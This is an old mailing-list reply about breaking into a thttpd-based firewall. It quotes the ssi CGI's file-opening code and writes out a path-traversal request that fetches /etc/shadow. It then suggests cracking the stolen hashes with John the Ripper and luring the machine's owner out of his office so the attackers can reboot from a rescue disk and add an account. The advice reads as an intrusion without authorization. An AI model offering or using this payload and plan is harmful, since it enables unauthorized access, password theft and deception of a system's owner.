Re: [vox-tech] Cracking...

  • Subject: Re: [vox-tech] Cracking...
  • From: Peter Jay Salzman <p@belialMAPS.ucdavis.edu>
  • Date: Fri, 01 Dec 2000 18:07:06 -0800

mark, something i found; it sounds like it may help.  thttpd comes, by
default, with a cgi program called ssi.   here's a code snippet:

        path_translated = getenv( "PATH_TRANSLATED" );
        if ( path_translated == (char*) 0 ) {
                internal_error( "Couldn't get PATH_TRANSLATED environment variable.");
                exit( 1 );
        }

        /* Open it. */
        fp = fopen( path_translated, "r" );
        read_file( path_info, path_translated, fp );

the PATH_TRANSLATED environment variable gets copied to path_translated, and
that gets fopen()'d.    the read_file function returns the contents of fp.

this means you can view any file on the system, so do:

        GET /cgi-bin/ssi//../../../../../../../../../etc/shadow

to get /etc/shadow.   maybe you can use john the ripper to crack some
passwords.  perhaps they left some GECOS inspired passwords as a bone.  :)

also, don't overlook physical security.  do you know where the firewall is
being kept?   if it's in his office, maybe you can get together with a
friend and try to get him to leave the office for a few minutes.  that
should be time enough to reboot the machine with a rescue disk, mount the
hard drive, edit /etc/shadow and /etc/passwd to create a new account, reboot
the machine.

pete